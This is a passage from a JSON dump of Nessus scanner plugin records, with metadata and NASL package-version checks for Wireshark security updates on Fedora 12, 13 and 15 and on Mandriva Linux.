audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-11T16:30:34", "description": "Upgrade to latest release, fixing few security bugs. See http://www.wireshark.org/docs/relnotes/wireshark-1.4.5.html and http://www.wireshark.org/docs/relnotes/wireshark-1.4.6.html\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-04-27T00:00:00", "type": "nessus", "title": "Fedora 15 : wireshark-1.4.6-1.fc15 (2011-5621)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590", "CVE-2011-1591"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wireshark", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2011-5621.NASL", "href": "https://www.tenable.com/plugins/nessus/53563", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-5621.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53563);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1591\");\n script_bugtraq_id(47392);\n script_xref(name:\"FEDORA\", value:\"2011-5621\");\n\n script_name(english:\"Fedora 15 : wireshark-1.4.6-1.fc15 (2011-5621)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upgrade to latest release, fixing few security bugs. See\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.4.5.html and\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.4.6.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.4.5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.4.5.html\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.4.6.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.4.6.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=697741\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=697746\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-April/058900.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c195660f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark packet-dect.c Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"wireshark-1.4.6-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-11T16:30:22", "description": "Upgrade to latest release, fixing few security bugs. See http://www.wireshark.org/docs/relnotes/wireshark-1.2.16.html\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-04-27T00:00:00", "type": "nessus", "title": "Fedora 13 : wireshark-1.2.16-1.fc13 (2011-5529)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590", "CVE-2011-1591"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wireshark", "cpe:/o:fedoraproject:fedora:13"], "id": "FEDORA_2011-5529.NASL", "href": "https://www.tenable.com/plugins/nessus/53561", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-5529.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53561);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1591\");\n script_xref(name:\"FEDORA\", value:\"2011-5529\");\n\n script_name(english:\"Fedora 13 : wireshark-1.2.16-1.fc13 (2011-5529)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upgrade to latest release, fixing few security bugs. See\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.2.16.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.16.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.16.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=697741\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=697746\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-April/058993.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?50cfff51\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark packet-dect.c Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"wireshark-1.2.16-1.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:03:35", "description": "This advisory updates wireshark to the latest version(s), fixing several security issues :\n\nBuffer overflow in the ASN.1 BER dissector in Wireshark 0.10.13 through 1.0.13 and 1.2.0 through 1.2.8 has unknown impact and remote attack vectors (CVE-2010-2284).\n\nBuffer overflow in the SigComp Universal Decompressor Virtual Machine dissector in Wireshark 0.10.8 through 1.0.13 and 1.2.0 through 1.2.8 has unknown impact and remote attack vectors (CVE-2010-2287).", "cvss3": {"score": null, "vector": null}, "published": "2010-08-05T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : wireshark (MDVSA-2010:144)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:dumpcap", "p-cpe:/a:mandriva:linux:lib64wireshark-devel", "p-cpe:/a:mandriva:linux:lib64wireshark0", "p-cpe:/a:mandriva:linux:libwireshark-devel", "p-cpe:/a:mandriva:linux:libwireshark0", "p-cpe:/a:mandriva:linux:rawshark", "p-cpe:/a:mandriva:linux:tshark", "p-cpe:/a:mandriva:linux:wireshark", "p-cpe:/a:mandriva:linux:wireshark-tools", "cpe:/o:mandriva:linux:2009.1", "cpe:/o:mandriva:linux:2010.0", "cpe:/o:mandriva:linux:2010.1"], "id": "MANDRIVA_MDVSA-2010-144.NASL", "href": "https://www.tenable.com/plugins/nessus/48251", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2010:144. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48251);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-2284\", \"CVE-2010-2287\");\n script_bugtraq_id(40728);\n script_xref(name:\"MDVSA\", value:\"2010:144\");\n\n script_name(english:\"Mandriva Linux Security Advisory : wireshark (MDVSA-2010:144)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This advisory updates wireshark to the latest version(s), fixing\nseveral security issues :\n\nBuffer overflow in the ASN.1 BER dissector in Wireshark 0.10.13\nthrough 1.0.13 and 1.2.0 through 1.2.8 has unknown impact and remote\nattack vectors (CVE-2010-2284).\n\nBuffer overflow in the SigComp Universal Decompressor Virtual Machine\ndissector in Wireshark 0.10.8 through 1.0.13 and 1.2.0 through 1.2.8\nhas unknown impact and remote attack vectors (CVE-2010-2287).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.0.15.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.wireshark.org/docs/relnotes/wireshark-1.2.10.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dumpcap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wireshark0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libwireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libwireshark0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:rawshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:wireshark-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dumpcap-1.0.15-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64wireshark-devel-1.0.15-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64wireshark0-1.0.15-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libwireshark-devel-1.0.15-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libwireshark0-1.0.15-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"rawshark-1.0.15-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"tshark-1.0.15-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"wireshark-1.0.15-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"wireshark-tools-1.0.15-0.1mdv2009.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.0\", reference:\"dumpcap-1.2.10-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64wireshark-devel-1.2.10-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64wireshark0-1.2.10-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libwireshark-devel-1.2.10-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libwireshark0-1.2.10-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"rawshark-1.2.10-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"tshark-1.2.10-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"wireshark-1.2.10-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"wireshark-tools-1.2.10-0.1mdv2010.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.1\", reference:\"dumpcap-1.2.10-0.1mdv2010.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64wireshark-devel-1.2.10-0.1mdv2010.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64wireshark0-1.2.10-0.1mdv2010.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libwireshark-devel-1.2.10-0.1mdv2010.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libwireshark0-1.2.10-0.1mdv2010.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"rawshark-1.2.10-0.1mdv2010.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"tshark-1.2.10-0.1mdv2010.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"wireshark-1.2.10-0.1mdv2010.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"wireshark-tools-1.2.10-0.1mdv2010.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:03:10", "description": "Update to upstream version 1.2.10: * http://www.wireshark.org/docs/relnotes/wireshark-1.2.7.html * http://www.wireshark.org/docs/relnotes/wireshark-1.2.8.html * http://www.wireshark.org/docs/relnotes/wireshark-1.2.9.html * http://www.wireshark.org/docs/relnotes/wireshark-1.2.10.html fixing multiple security issues: * http://www.wireshark.org/security/wnpa-sec-2010-04.html * http://www.wireshark.org/security/wnpa-sec-2010-06.html * http://www.wireshark.org/security/wnpa-sec-2010-08.html\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2010-09-03T00:00:00", "type": "nessus", "title": "Fedora 12 : wireshark-1.2.10-1.fc12 (2010-13427)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2992", "CVE-2010-2993", "CVE-2010-2995"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wireshark", "cpe:/o:fedoraproject:fedora:12"], "id": "FEDORA_2010-13427.NASL", "href": "https://www.tenable.com/plugins/nessus/49093", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-13427.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49093);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2992\", \"CVE-2010-2993\", \"CVE-2010-2995\");\n script_xref(name:\"FEDORA\", value:\"2010-13427\");\n\n script_name(english:\"Fedora 12 : wireshark-1.2.10-1.fc12 (2010-13427)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to upstream version 1.2.10: *\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.2.7.html *\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.2.8.html *\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.2.9.html *\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.2.10.html fixing\nmultiple security issues: *\nhttp://www.wireshark.org/security/wnpa-sec-2010-04.html *\nhttp://www.wireshark.org/security/wnpa-sec-2010-06.html *\nhttp://www.wireshark.org/security/wnpa-sec-2010-08.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.10.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.10.html\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.7.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.7.html\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.8.html\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.9.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.9.html\"\n );\n # http://www.wireshark.org/security/wnpa-sec-2010-04.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/security/wnpa-sec-2010-04.html\"\n );\n # http://www.wireshark.org/security/wnpa-sec-2010-06.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/security/wnpa-sec-2010-06.html\"\n );\n # http://www.wireshark.org/security/wnpa-sec-2010-08.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/security/wnpa-sec-2010-08.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=590613\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=604290\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=604292\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=604302\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=604308\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=623843\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-September/046962.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?94fdf596\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 